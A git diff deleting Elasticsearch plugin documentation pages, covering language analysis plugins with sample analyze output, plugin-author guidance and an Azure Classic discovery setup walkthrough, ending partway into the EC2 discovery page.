/dev/null @@ -1,428 +0,0 @@ -[[analysis-smartcn]] -=== Smart Chinese Analysis Plugin - -The Smart Chinese Analysis plugin integrates Lucene's Smart Chinese analysis -module into elasticsearch. - -It provides an analyzer for Chinese or mixed Chinese-English text. This -analyzer uses probabilistic knowledge to find the optimal word segmentation -for Simplified Chinese text. The text is first broken into sentences, then -each sentence is segmented into words. - -:plugin_name: analysis-smartcn -include::install_remove.asciidoc[] - - -[[analysis-smartcn-tokenizer]] -[discrete] -==== `smartcn` tokenizer and token filter - -The plugin provides the `smartcn` analyzer, `smartcn_tokenizer` tokenizer, and -`smartcn_stop` token filter which are not configurable. - -NOTE: The `smartcn_word` token filter and `smartcn_sentence` have been deprecated. - -==== Reimplementing and extending the analyzers - -The `smartcn` analyzer could be reimplemented as a `custom` analyzer that can -then be extended and configured as follows: - -[source,console] ----------------------------------------------------- -PUT smartcn_example -{ - "settings": { - "analysis": { - "analyzer": { - "rebuilt_smartcn": { - "tokenizer": "smartcn_tokenizer", - "filter": [ - "porter_stem", - "smartcn_stop" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: smartcn_example, first: smartcn, second: rebuilt_smartcn}\nendyaml\n/] - -[[analysis-smartcn_stop]] -==== `smartcn_stop` token filter - -The `smartcn_stop` token filter filters out stopwords defined by `smartcn` -analyzer (`_smartcn_`), and any other custom stopwords specified by the user. -This filter only supports the predefined `_smartcn_` stopwords list. -If you want to use a different predefined list, then use the -{ref}/analysis-stop-tokenfilter.html[`stop` token filter] instead. 
- -[source,console] --------------------------------------------------- -PUT smartcn_example -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "smartcn_with_stop": { - "tokenizer": "smartcn_tokenizer", - "filter": [ - "porter_stem", - "my_smartcn_stop" - ] - } - }, - "filter": { - "my_smartcn_stop": { - "type": "smartcn_stop", - "stopwords": [ - "_smartcn_", - "stack", - "的" - ] - } - } - } - } - } -} - -GET smartcn_example/_analyze -{ - "analyzer": "smartcn_with_stop", - "text": "哈喽,我们是 Elastic 我们是 Elastic Stack(Elasticsearch、Kibana、Beats 和 Logstash)的开发公司。从股票行情到 Twitter 消息流,从 Apache 日志到 WordPress 博文,我们可以帮助人们体验搜索的强大力量,帮助他们以截然不同的方式探索和分析数据" -} --------------------------------------------------- - -The above request returns: - -[source,console-result] --------------------------------------------------- -{ - "tokens": [ - { - "token": "哈", - "start_offset": 0, - "end_offset": 1, - "type": "word", - "position": 0 - }, - { - "token": "喽", - "start_offset": 1, - "end_offset": 2, - "type": "word", - "position": 1 - }, - { - "token": "我们", - "start_offset": 3, - "end_offset": 5, - "type": "word", - "position": 3 - }, - { - "token": "是", - "start_offset": 5, - "end_offset": 6, - "type": "word", - "position": 4 - }, - { - "token": "elast", - "start_offset": 7, - "end_offset": 14, - "type": "word", - "position": 5 - }, - { - "token": "我们", - "start_offset": 17, - "end_offset": 19, - "type": "word", - "position": 6 - }, - { - "token": "是", - "start_offset": 19, - "end_offset": 20, - "type": "word", - "position": 7 - }, - { - "token": "elast", - "start_offset": 21, - "end_offset": 28, - "type": "word", - "position": 8 - }, - { - "token": "elasticsearch", - "start_offset": 35, - "end_offset": 48, - "type": "word", - "position": 11 - }, - { - "token": "kibana", - "start_offset": 49, - "end_offset": 55, - "type": "word", - "position": 13 - }, - { - "token": "beat", - "start_offset": 56, - "end_offset": 61, - "type": "word", - "position": 15 - }, - { - "token": "和", - "start_offset": 62, - "end_offset": 63, - "type": "word", - "position": 16 - }, - { - "token": "logstash", - "start_offset": 64, - "end_offset": 72, - "type": "word", - "position": 17 - }, - { - "token": "开发", - "start_offset": 74, - "end_offset": 76, - "type": "word", - "position": 20 - }, - { - "token": "公司", - "start_offset": 76, - "end_offset": 78, - "type": "word", - "position": 21 - }, - { - "token": "从", - "start_offset": 79, - "end_offset": 80, - "type": "word", - "position": 23 - }, - { - "token": "股票", - "start_offset": 80, - "end_offset": 82, - "type": "word", - "position": 24 - }, - { - "token": "行情", - "start_offset": 82, - "end_offset": 84, - "type": "word", - "position": 25 - }, - { - "token": "到", - "start_offset": 84, - "end_offset": 85, - "type": "word", - "position": 26 - }, - { - "token": "twitter", - "start_offset": 86, - "end_offset": 93, - "type": "word", - "position": 27 - }, - { - "token": "消息", - "start_offset": 94, - "end_offset": 96, - "type": "word", - "position": 28 - }, - { - "token": "流", - "start_offset": 96, - "end_offset": 97, - "type": "word", - "position": 29 - }, - { - "token": "从", - "start_offset": 98, - "end_offset": 99, - "type": "word", - "position": 31 - }, - { - "token": "apach", - "start_offset": 100, - "end_offset": 106, - "type": "word", - "position": 32 - }, - { - "token": "日志", - "start_offset": 107, - "end_offset": 109, - "type": "word", - "position": 33 - }, - { - "token": "到", - "start_offset": 109, - "end_offset": 110, - "type": "word", - "position": 34 - }, - { - "token": 
"wordpress", - "start_offset": 111, - "end_offset": 120, - "type": "word", - "position": 35 - }, - { - "token": "博", - "start_offset": 121, - "end_offset": 122, - "type": "word", - "position": 36 - }, - { - "token": "文", - "start_offset": 122, - "end_offset": 123, - "type": "word", - "position": 37 - }, - { - "token": "我们", - "start_offset": 124, - "end_offset": 126, - "type": "word", - "position": 39 - }, - { - "token": "可以", - "start_offset": 126, - "end_offset": 128, - "type": "word", - "position": 40 - }, - { - "token": "帮助", - "start_offset": 128, - "end_offset": 130, - "type": "word", - "position": 41 - }, - { - "token": "人们", - "start_offset": 130, - "end_offset": 132, - "type": "word", - "position": 42 - }, - { - "token": "体验", - "start_offset": 132, - "end_offset": 134, - "type": "word", - "position": 43 - }, - { - "token": "搜索", - "start_offset": 134, - "end_offset": 136, - "type": "word", - "position": 44 - }, - { - "token": "强大", - "start_offset": 137, - "end_offset": 139, - "type": "word", - "position": 46 - }, - { - "token": "力量", - "start_offset": 139, - "end_offset": 141, - "type": "word", - "position": 47 - }, - { - "token": "帮助", - "start_offset": 142, - "end_offset": 144, - "type": "word", - "position": 49 - }, - { - "token": "他们", - "start_offset": 144, - "end_offset": 146, - "type": "word", - "position": 50 - }, - { - "token": "以", - "start_offset": 146, - "end_offset": 147, - "type": "word", - "position": 51 - }, - { - "token": "截然不同", - "start_offset": 147, - "end_offset": 151, - "type": "word", - "position": 52 - }, - { - "token": "方式", - "start_offset": 152, - "end_offset": 154, - "type": "word", - "position": 54 - }, - { - "token": "探索", - "start_offset": 154, - "end_offset": 156, - "type": "word", - "position": 55 - }, - { - "token": "和", - "start_offset": 156, - "end_offset": 157, - "type": "word", - "position": 56 - }, - { - "token": "分析", - "start_offset": 157, - "end_offset": 159, - "type": "word", - "position": 57 - }, - { - "token": "数据", - "start_offset": 159, - "end_offset": 161, - "type": "word", - "position": 58 - } - ] -} --------------------------------------------------- diff --git a/docs/plugins/analysis-stempel.asciidoc b/docs/plugins/analysis-stempel.asciidoc deleted file mode 100644 index 54118945ab3..00000000000 --- a/docs/plugins/analysis-stempel.asciidoc +++ /dev/null @@ -1,112 +0,0 @@ -[[analysis-stempel]] -=== Stempel Polish Analysis Plugin - -The Stempel Analysis plugin integrates Lucene's Stempel analysis -module for Polish into elasticsearch. - -:plugin_name: analysis-stempel -include::install_remove.asciidoc[] - -[[analysis-stempel-tokenizer]] -[discrete] -==== `stempel` tokenizer and token filters - -The plugin provides the `polish` analyzer and the `polish_stem` and `polish_stop` token filters, -which are not configurable. 
- -==== Reimplementing and extending the analyzers - -The `polish` analyzer could be reimplemented as a `custom` analyzer that can -then be extended and configured differently as follows: - -[source,console] ----------------------------------------------------- -PUT /stempel_example -{ - "settings": { - "analysis": { - "analyzer": { - "rebuilt_stempel": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "polish_stop", - "polish_stem" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: stempel_example, first: polish, second: rebuilt_stempel}\nendyaml\n/] - -[[analysis-polish-stop]] -==== `polish_stop` token filter - -The `polish_stop` token filter filters out Polish stopwords (`_polish_`), and -any other custom stopwords specified by the user. This filter only supports -the predefined `_polish_` stopwords list. If you want to use a different -predefined list, then use the -{ref}/analysis-stop-tokenfilter.html[`stop` token filter] instead. - -[source,console] --------------------------------------------------- -PUT /polish_stop_example -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "analyzer_with_stop": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "polish_stop" - ] - } - }, - "filter": { - "polish_stop": { - "type": "polish_stop", - "stopwords": [ - "_polish_", - "jeść" - ] - } - } - } - } - } -} - -GET polish_stop_example/_analyze -{ - "analyzer": "analyzer_with_stop", - "text": "Gdzie kucharek sześć, tam nie ma co jeść." -} --------------------------------------------------- - -The above request returns: - -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "kucharek", - "start_offset" : 6, - "end_offset" : 14, - "type" : "", - "position" : 1 - }, - { - "token" : "sześć", - "start_offset" : 15, - "end_offset" : 20, - "type" : "", - "position" : 2 - } - ] -} --------------------------------------------------- diff --git a/docs/plugins/analysis-ukrainian.asciidoc b/docs/plugins/analysis-ukrainian.asciidoc deleted file mode 100644 index 534c1708b98..00000000000 --- a/docs/plugins/analysis-ukrainian.asciidoc +++ /dev/null @@ -1,15 +0,0 @@ -[[analysis-ukrainian]] -=== Ukrainian Analysis Plugin - -The Ukrainian Analysis plugin integrates Lucene's UkrainianMorfologikAnalyzer into elasticsearch. - -It provides stemming for Ukrainian using the https://github.com/morfologik/morfologik-stemming[Morfologik project]. - -:plugin_name: analysis-ukrainian -include::install_remove.asciidoc[] - -[[analysis-ukrainian-analyzer]] -[discrete] -==== `ukrainian` analyzer - -The plugin provides the `ukrainian` analyzer. diff --git a/docs/plugins/analysis.asciidoc b/docs/plugins/analysis.asciidoc deleted file mode 100644 index bc347744340..00000000000 --- a/docs/plugins/analysis.asciidoc +++ /dev/null @@ -1,71 +0,0 @@ -[[analysis]] -== Analysis Plugins - -Analysis plugins extend Elasticsearch by adding new analyzers, tokenizers, -token filters, or character filters to Elasticsearch. - -[discrete] -==== Core analysis plugins - -The core analysis plugins are: - -<>:: - -Adds extended Unicode support using the http://site.icu-project.org/[ICU] -libraries, including better analysis of Asian languages, Unicode -normalization, Unicode-aware case folding, collation support, and -transliteration. - -<>:: - -Advanced analysis of Japanese using the https://www.atilika.org/[Kuromoji analyzer]. 
- -<>:: - -Morphological analysis of Korean using the Lucene Nori analyzer. - -<>:: - -Analyzes tokens into their phonetic equivalent using Soundex, Metaphone, -Caverphone, and other codecs. - -<>:: - -An analyzer for Chinese or mixed Chinese-English text. This analyzer uses -probabilistic knowledge to find the optimal word segmentation for Simplified -Chinese text. The text is first broken into sentences, then each sentence is -segmented into words. - -<>:: - -Provides high quality stemming for Polish. - -<>:: - -Provides stemming for Ukrainian. - -[discrete] -==== Community contributed analysis plugins - -A number of analysis plugins have been contributed by our community: - -* https://github.com/medcl/elasticsearch-analysis-ik[IK Analysis Plugin] (by Medcl) -* https://github.com/medcl/elasticsearch-analysis-pinyin[Pinyin Analysis Plugin] (by Medcl) -* https://github.com/duydo/elasticsearch-analysis-vietnamese[Vietnamese Analysis Plugin] (by Duy Do) -* https://github.com/ofir123/elasticsearch-network-analysis[Network Addresses Analysis Plugin] (by Ofir123) -* https://github.com/ZarHenry96/elasticsearch-dandelion-plugin[Dandelion Analysis Plugin] (by ZarHenry96) -* https://github.com/medcl/elasticsearch-analysis-stconvert[STConvert Analysis Plugin] (by Medcl) - -include::analysis-icu.asciidoc[] - -include::analysis-kuromoji.asciidoc[] - -include::analysis-nori.asciidoc[] - -include::analysis-phonetic.asciidoc[] - -include::analysis-smartcn.asciidoc[] - -include::analysis-stempel.asciidoc[] - -include::analysis-ukrainian.asciidoc[] diff --git a/docs/plugins/api.asciidoc b/docs/plugins/api.asciidoc deleted file mode 100644 index ad12ddbdbf0..00000000000 --- a/docs/plugins/api.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ -[[api]] -== API Extension Plugins - -API extension plugins add new functionality to Elasticsearch by adding new APIs or features, usually to do with search or mapping. - -[discrete] -=== Community contributed API extension plugins - -A number of plugins have been contributed by our community: - -* https://github.com/carrot2/elasticsearch-carrot2[carrot2 Plugin]: - Results clustering with https://github.com/carrot2/carrot2[carrot2] (by Dawid Weiss) - -* https://github.com/wikimedia/search-extra[Elasticsearch Trigram Accelerated Regular Expression Filter]: - (by Wikimedia Foundation/Nik Everett) - -* https://github.com/wikimedia/search-highlighter[Elasticsearch Experimental Highlighter]: - (by Wikimedia Foundation/Nik Everett) - -* https://github.com/YannBrrd/elasticsearch-entity-resolution[Entity Resolution Plugin]: - Uses https://github.com/larsga/Duke[Duke] for duplication detection (by Yann Barraud) - -* https://github.com/zentity-io/zentity[Entity Resolution Plugin] (https://zentity.io[zentity]): - Real-time entity resolution with pure Elasticsearch (by Dave Moore) - -* https://github.com/ritesh-kapoor/elasticsearch-pql[PQL language Plugin]: - Allows Elasticsearch to be queried with simple pipeline query syntax. 
- -* https://github.com/codelibs/elasticsearch-taste[Elasticsearch Taste Plugin]: - Mahout Taste-based Collaborative Filtering implementation (by CodeLibs Project) - -* https://github.com/jurgc11/es-change-feed-plugin[WebSocket Change Feed Plugin] (by ForgeRock/Chris Clifton) diff --git a/docs/plugins/authors.asciidoc b/docs/plugins/authors.asciidoc deleted file mode 100644 index 76a0588cead..00000000000 --- a/docs/plugins/authors.asciidoc +++ /dev/null @@ -1,120 +0,0 @@ -[[plugin-authors]] -== Help for plugin authors - -:plugin-properties-files: {elasticsearch-root}/buildSrc/src/main/resources - -The Elasticsearch repository contains examples of: - -* a https://github.com/elastic/elasticsearch/tree/master/plugins/examples/custom-settings[Java plugin] - which contains a plugin with custom settings. -* a https://github.com/elastic/elasticsearch/tree/master/plugins/examples/rest-handler[Java plugin] - which contains a plugin that registers a Rest handler. -* a https://github.com/elastic/elasticsearch/tree/master/plugins/examples/rescore[Java plugin] - which contains a rescore plugin. -* a https://github.com/elastic/elasticsearch/tree/master/plugins/examples/script-expert-scoring[Java plugin] - which contains a script plugin. - -These examples provide the bare bones needed to get started. For more -information about how to write a plugin, we recommend looking at the plugins -listed in this documentation for inspiration. - -[discrete] -=== Plugin descriptor file - -All plugins must contain a file called `plugin-descriptor.properties`. -The format for this file is described in detail in this example: - -["source","properties"] --------------------------------------------------- -include::{plugin-properties-files}/plugin-descriptor.properties[] --------------------------------------------------- - -Either fill in this template yourself or, if you are using Elasticsearch's Gradle build system, you -can fill in the necessary values in the `build.gradle` file for your plugin. - -[discrete] -==== Mandatory elements for plugins - - -[cols="<,<,<",options="header",] -|======================================================================= -|Element | Type | Description - -|`description` |String | simple summary of the plugin - -|`version` |String | plugin's version - -|`name` |String | the plugin name - -|`classname` |String | the name of the class to load, fully-qualified. - -|`java.version` |String | version of java the code is built against. -Use the system property `java.specification.version`. Version string must be a sequence -of nonnegative decimal integers separated by "."'s and may have leading zeros. - -|`elasticsearch.version` |String | version of Elasticsearch compiled against. - -|======================================================================= - -Note that only jar files at the root of the plugin are added to the classpath for the plugin! -If you need other resources, package them into a resources jar. - -[IMPORTANT] -.Plugin release lifecycle -============================================== - -You will have to release a new version of the plugin for each new Elasticsearch release. -This version is checked when the plugin is loaded so Elasticsearch will refuse to start -in the presence of plugins with the incorrect `elasticsearch.version`. - -============================================== - - -[discrete] -=== Testing your plugin - -When testing a Java plugin, it will only be auto-loaded if it is in the -`plugins/` directory. 
Use `bin/elasticsearch-plugin install file:///path/to/your/plugin` -to install your plugin for testing. - -You may also load your plugin within the test framework for integration tests. -Read more in {ref}/integration-tests.html#changing-node-configuration[Changing Node Configuration]. - - -[discrete] -[[plugin-authors-jsm]] -=== Java Security permissions - -Some plugins may need additional security permissions. A plugin can include -the optional `plugin-security.policy` file containing `grant` statements for -additional permissions. Any additional permissions will be displayed to the user -with a large warning, and they will have to confirm them when installing the -plugin interactively. So if possible, it is best to avoid requesting any -spurious permissions! - -If you are using the Elasticsearch Gradle build system, place this file in -`src/main/plugin-metadata` and it will be applied during unit tests as well. - -Keep in mind that the Java security model is stack-based, and the additional -permissions will only be granted to the jars in your plugin, so you will have -write proper security code around operations requiring elevated privileges. -It is recommended to add a check to prevent unprivileged code (such as scripts) -from gaining escalated permissions. For example: - -[source,java] --------------------------------------------------- -// ES permission you should check before doPrivileged() blocks -import org.elasticsearch.SpecialPermission; - -SecurityManager sm = System.getSecurityManager(); -if (sm != null) { - // unprivileged code such as scripts do not have SpecialPermission - sm.checkPermission(new SpecialPermission()); -} -AccessController.doPrivileged( - // sensitive operation -); --------------------------------------------------- - -See https://www.oracle.com/technetwork/java/seccodeguide-139067.html[Secure Coding Guidelines for Java SE] -for more information. diff --git a/docs/plugins/discovery-azure-classic.asciidoc b/docs/plugins/discovery-azure-classic.asciidoc deleted file mode 100644 index b7a94ea60e2..00000000000 --- a/docs/plugins/discovery-azure-classic.asciidoc +++ /dev/null @@ -1,485 +0,0 @@ -[[discovery-azure-classic]] -=== Azure Classic Discovery Plugin - -The Azure Classic Discovery plugin uses the Azure Classic API to identify the -addresses of seed hosts. - -deprecated[5.0.0, This plugin will be removed in the future] - -:plugin_name: discovery-azure-classic -include::install_remove.asciidoc[] - - -[[discovery-azure-classic-usage]] -==== Azure Virtual Machine Discovery - -Azure VM discovery allows to use the Azure APIs to perform automatic discovery. -Here is a simple sample configuration: - -[source,yaml] ----- -cloud: - azure: - management: - subscription.id: XXX-XXX-XXX-XXX - cloud.service.name: es-demo-app - keystore: - path: /path/to/azurekeystore.pkcs12 - password: WHATEVER - type: pkcs12 - -discovery: - seed_providers: azure ----- - -[IMPORTANT] -.Binding the network host -============================================== - -The keystore file must be placed in a directory accessible by Elasticsearch like the `config` directory. - -It's important to define `network.host` as by default it's bound to `localhost`. - -You can use {ref}/modules-network.html[core network host settings]. For example `_en0_`. 
- -============================================== - -[[discovery-azure-classic-short]] -===== How to start (short story) - -* Create Azure instances -* Install Elasticsearch -* Install Azure plugin -* Modify `elasticsearch.yml` file -* Start Elasticsearch - -[[discovery-azure-classic-settings]] -===== Azure credential API settings - -The following are a list of settings that can further control the credential API: - -[horizontal] -`cloud.azure.management.keystore.path`:: - - /path/to/keystore - -`cloud.azure.management.keystore.type`:: - - `pkcs12`, `jceks` or `jks`. Defaults to `pkcs12`. - -`cloud.azure.management.keystore.password`:: - - your_password for the keystore - -`cloud.azure.management.subscription.id`:: - - your_azure_subscription_id - -`cloud.azure.management.cloud.service.name`:: - - your_azure_cloud_service_name. This is the cloud service name/DNS but without the `cloudapp.net` part. - So if the DNS name is `abc.cloudapp.net` then the `cloud.service.name` to use is just `abc`. - - -[[discovery-azure-classic-settings-advanced]] -===== Advanced settings - -The following are a list of settings that can further control the discovery: - -`discovery.azure.host.type`:: - - Either `public_ip` or `private_ip` (default). Azure discovery will use the - one you set to ping other nodes. - -`discovery.azure.endpoint.name`:: - - When using `public_ip` this setting is used to identify the endpoint name - used to forward requests to Elasticsearch (aka transport port name). - Defaults to `elasticsearch`. In Azure management console, you could define - an endpoint `elasticsearch` forwarding for example requests on public IP - on port 8100 to the virtual machine on port 9300. - -`discovery.azure.deployment.name`:: - - Deployment name if any. Defaults to the value set with - `cloud.azure.management.cloud.service.name`. - -`discovery.azure.deployment.slot`:: - - Either `staging` or `production` (default). - -For example: - -[source,yaml] ----- -discovery: - type: azure - azure: - host: - type: private_ip - endpoint: - name: elasticsearch - deployment: - name: your_azure_cloud_service_name - slot: production ----- - -[[discovery-azure-classic-long]] -==== Setup process for Azure Discovery - -We will expose here one strategy which is to hide our Elasticsearch cluster from outside. - -With this strategy, only VMs behind the same virtual port can talk to each -other. That means that with this mode, you can use Elasticsearch unicast -discovery to build a cluster, using the Azure API to retrieve information -about your nodes. - -[[discovery-azure-classic-long-prerequisites]] -===== Prerequisites - -Before starting, you need to have: - -* A https://azure.microsoft.com/en-us/[Windows Azure account] -* OpenSSL that isn't from MacPorts, specifically `OpenSSL 1.0.1f 6 Jan - 2014` doesn't seem to create a valid keypair for ssh. FWIW, - `OpenSSL 1.0.1c 10 May 2012` on Ubuntu 14.04 LTS is known to work. -* SSH keys and certificate -+ --- - -You should follow http://azure.microsoft.com/en-us/documentation/articles/linux-use-ssh-key/[this guide] to learn -how to create or use existing SSH keys. If you have already did it, you can skip the following. 
- -Here is a description on how to generate SSH keys using `openssl`: - -[source,sh] ----- -# You may want to use another dir than /tmp -cd /tmp -openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout azure-private.key -out azure-certificate.pem -chmod 600 azure-private.key azure-certificate.pem -openssl x509 -outform der -in azure-certificate.pem -out azure-certificate.cer ----- - -Generate a keystore which will be used by the plugin to authenticate with a certificate -all Azure API calls. - -[source,sh] ----- -# Generate a keystore (azurekeystore.pkcs12) -# Transform private key to PEM format -openssl pkcs8 -topk8 -nocrypt -in azure-private.key -inform PEM -out azure-pk.pem -outform PEM -# Transform certificate to PEM format -openssl x509 -inform der -in azure-certificate.cer -out azure-cert.pem -cat azure-cert.pem azure-pk.pem > azure.pem.txt -# You MUST enter a password! -openssl pkcs12 -export -in azure.pem.txt -out azurekeystore.pkcs12 -name azure -noiter -nomaciter ----- - -Upload the `azure-certificate.cer` file both in the Elasticsearch Cloud Service (under `Manage Certificates`), -and under `Settings -> Manage Certificates`. - -IMPORTANT: When prompted for a password, you need to enter a non empty one. - -See this http://www.windowsazure.com/en-us/manage/linux/how-to-guides/ssh-into-linux/[guide] for -more details about how to create keys for Azure. - -Once done, you need to upload your certificate in Azure: - -* Go to the https://account.windowsazure.com/[management console]. -* Sign in using your account. -* Click on `Portal`. -* Go to Settings (bottom of the left list) -* On the bottom bar, click on `Upload` and upload your `azure-certificate.cer` file. - -You may want to use -http://www.windowsazure.com/en-us/develop/nodejs/how-to-guides/command-line-tools/[Windows Azure Command-Line Tool]: - --- - -* Install https://github.com/joyent/node/wiki/Installing-Node.js-via-package-manager[NodeJS], for example using -homebrew on MacOS X: -+ -[source,sh] ----- -brew install node ----- - -* Install Azure tools -+ -[source,sh] ----- -sudo npm install azure-cli -g ----- - -* Download and import your azure settings: -+ -[source,sh] ----- -# This will open a browser and will download a .publishsettings file -azure account download - -# Import this file (we have downloaded it to /tmp) -# Note, it will create needed files in ~/.azure. You can remove azure.publishsettings when done. -azure account import /tmp/azure.publishsettings ----- - -[[discovery-azure-classic-long-instance]] -===== Creating your first instance - -You need to have a storage account available. Check http://www.windowsazure.com/en-us/develop/net/how-to-guides/blob-storage/#create-account[Azure Blob Storage documentation] -for more information. - -You will need to choose the operating system you want to run on. 
To get a list of official available images, run: - -[source,sh] ----- -azure vm image list ----- - -Let's say we are going to deploy an Ubuntu image on an extra small instance in West Europe: - -[horizontal] -Azure cluster name:: - - `azure-elasticsearch-cluster` - -Image:: - - `b39f27a8b8c64d52b05eac6a62ebad85__Ubuntu-13_10-amd64-server-20130808-alpha3-en-us-30GB` - -VM Name:: - - `myesnode1` - -VM Size:: - - `extrasmall` - -Location:: - - `West Europe` - -Login:: - - `elasticsearch` - -Password:: - - `password1234!!` - - -Using command line: - -[source,sh] ----- -azure vm create azure-elasticsearch-cluster \ - b39f27a8b8c64d52b05eac6a62ebad85__Ubuntu-13_10-amd64-server-20130808-alpha3-en-us-30GB \ - --vm-name myesnode1 \ - --location "West Europe" \ - --vm-size extrasmall \ - --ssh 22 \ - --ssh-cert /tmp/azure-certificate.pem \ - elasticsearch password1234\!\! ----- - -You should see something like: - -[source,text] ----- -info: Executing command vm create -+ Looking up image -+ Looking up cloud service -+ Creating cloud service -+ Retrieving storage accounts -+ Configuring certificate -+ Creating VM -info: vm create command OK ----- - -Now, your first instance is started. - -[TIP] -.Working with SSH -=============================================== - -You need to give the private key and username each time you log on your instance: - -[source,sh] ----- -ssh -i ~/.ssh/azure-private.key elasticsearch@myescluster.cloudapp.net ----- - -But you can also define it once in `~/.ssh/config` file: - -[source,text] ----- -Host *.cloudapp.net - User elasticsearch - StrictHostKeyChecking no - UserKnownHostsFile=/dev/null - IdentityFile ~/.ssh/azure-private.key ----- -=============================================== - -Next, you need to install Elasticsearch on your new instance. 
First, copy your -keystore to the instance, then connect to the instance using SSH: - -[source,sh] ----- -scp /tmp/azurekeystore.pkcs12 azure-elasticsearch-cluster.cloudapp.net:/home/elasticsearch -ssh azure-elasticsearch-cluster.cloudapp.net ----- - -Once connected, {stack-gs}/get-started-elastic-stack.html#install-elasticsearch[install {es}]: - -Check that Elasticsearch is running: - -[source,console] ----- -GET / ----- - -This command should give you a JSON result: - -["source","js",subs="attributes,callouts"] --------------------------------------------- -{ - "name" : "Cp8oag6", - "cluster_name" : "elasticsearch", - "cluster_uuid" : "AT69_T_DTp-1qgIJlatQqA", - "version" : { - "number" : "{version_qualified}", - "build_flavor" : "{build_flavor}", - "build_type" : "{build_type}", - "build_hash" : "f27399d", - "build_date" : "2016-03-30T09:51:41.449Z", - "build_snapshot" : false, - "lucene_version" : "{lucene_version}", - "minimum_wire_compatibility_version" : "1.2.3", - "minimum_index_compatibility_version" : "1.2.3" - }, - "tagline" : "You Know, for Search" -} --------------------------------------------- -// TESTRESPONSE[s/"name" : "Cp8oag6",/"name" : "$body.name",/] -// TESTRESPONSE[s/"cluster_name" : "elasticsearch",/"cluster_name" : "$body.cluster_name",/] -// TESTRESPONSE[s/"cluster_uuid" : "AT69_T_DTp-1qgIJlatQqA",/"cluster_uuid" : "$body.cluster_uuid",/] -// TESTRESPONSE[s/"build_hash" : "f27399d",/"build_hash" : "$body.version.build_hash",/] -// TESTRESPONSE[s/"build_date" : "2016-03-30T09:51:41.449Z",/"build_date" : $body.version.build_date,/] -// TESTRESPONSE[s/"build_snapshot" : false,/"build_snapshot" : $body.version.build_snapshot,/] -// TESTRESPONSE[s/"minimum_wire_compatibility_version" : "1.2.3"/"minimum_wire_compatibility_version" : $body.version.minimum_wire_compatibility_version/] -// TESTRESPONSE[s/"minimum_index_compatibility_version" : "1.2.3"/"minimum_index_compatibility_version" : $body.version.minimum_index_compatibility_version/] -// So much s/// but at least we test that the layout is close to matching.... - -[[discovery-azure-classic-long-plugin]] -===== Install Elasticsearch cloud azure plugin - -[source,sh] ----- -# Stop Elasticsearch -sudo service elasticsearch stop - -# Install the plugin -sudo /usr/share/elasticsearch/bin/elasticsearch-plugin install discovery-azure-classic - -# Configure it -sudo vi /etc/elasticsearch/elasticsearch.yml ----- - -And add the following lines: - -[source,yaml] ----- -# If you don't remember your account id, you may get it with `azure account list` -cloud: - azure: - management: - subscription.id: your_azure_subscription_id - cloud.service.name: your_azure_cloud_service_name - keystore: - path: /home/elasticsearch/azurekeystore.pkcs12 - password: your_password_for_keystore - -discovery: - type: azure - -# Recommended (warning: non durable disk) -# path.data: /mnt/resource/elasticsearch/data ----- - -Restart Elasticsearch: - -[source,sh] ----- -sudo service elasticsearch start ----- - -If anything goes wrong, check your logs in `/var/log/elasticsearch`. - -[[discovery-azure-classic-scale]] -==== Scaling Out! - -You need first to create an image of your previous machine. 
-Disconnect from your machine and run locally the following commands: - -[source,sh] ----- -# Shutdown the instance -azure vm shutdown myesnode1 - -# Create an image from this instance (it could take some minutes) -azure vm capture myesnode1 esnode-image --delete - -# Note that the previous instance has been deleted (mandatory) -# So you need to create it again and BTW create other instances. - -azure vm create azure-elasticsearch-cluster \ - esnode-image \ - --vm-name myesnode1 \ - --location "West Europe" \ - --vm-size extrasmall \ - --ssh 22 \ - --ssh-cert /tmp/azure-certificate.pem \ - elasticsearch password1234\!\! ----- - - -[TIP] -========================================= -It could happen that azure changes the endpoint public IP address. -DNS propagation could take some minutes before you can connect again using -name. You can get from azure the IP address if needed, using: - -[source,sh] ----- -# Look at Network `Endpoints 0 Vip` -azure vm show myesnode1 ----- - -========================================= - -Let's start more instances! - -[source,sh] ----- -for x in $(seq 2 10) - do - echo "Launching azure instance #$x..." - azure vm create azure-elasticsearch-cluster \ - esnode-image \ - --vm-name myesnode$x \ - --vm-size extrasmall \ - --ssh $((21 + $x)) \ - --ssh-cert /tmp/azure-certificate.pem \ - --connect \ - elasticsearch password1234\!\! - done ----- - -If you want to remove your running instances: - -[source,sh] ----- -azure vm delete myesnode1 ----- diff --git a/docs/plugins/discovery-ec2.asciidoc b/docs/plugins/discovery-ec2.asciidoc deleted file mode 100644 index f5c6c76402a..00000000000 --- a/docs/plugins/discovery-ec2.asciidoc +++ /dev/null @@ -1,368 +0,0 @@ -[[discovery-ec2]] -=== EC2 Discovery Plugin - -The EC2 discovery plugin provides a list of seed addresses to the -{ref}/modules-discovery-hosts-providers.html[discovery process] by querying the -https://github.com/aws/aws-sdk-java[AWS API] for a list of EC2 instances -matching certain criteria determined by the <>. - -*If you are looking for a hosted solution of {es} on AWS, please visit -https://www.elastic.co/cloud.* - -:plugin_name: discovery-ec2 -include::install_remove.asciidoc[] - -[[discovery-ec2-usage]] -==== Using the EC2 discovery plugin - -The `discovery-ec2` plugin allows {es} to find the master-eligible nodes in a -cluster running on AWS EC2 by querying the -https://github.com/aws/aws-sdk-java[AWS API] for the addresses of the EC2 -instances running these nodes. - -It is normally a good idea to restrict the discovery process just to the -master-eligible nodes in the cluster. This plugin allows you to identify these -nodes by certain criteria including their tags, their membership of security -groups, and their placement within availability zones. The discovery process -will work correctly even if it finds master-ineligible nodes, but master -elections will be more efficient if this can be avoided. - -The interaction with the AWS API can be authenticated using the -https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html[instance -role], or else custom credentials can be supplied. - -===== Enabling EC2 discovery - -To enable EC2 discovery, configure {es} to use the `ec2` seed hosts provider: - -[source,yaml] ----- -discovery.seed_providers: ec2 ----- - -===== Configuring EC2 discovery - -EC2 discovery supports a number of settings. Some settings are sensitive and -must be stored in the {ref}/secure-settings.html[{es} keystore]. 
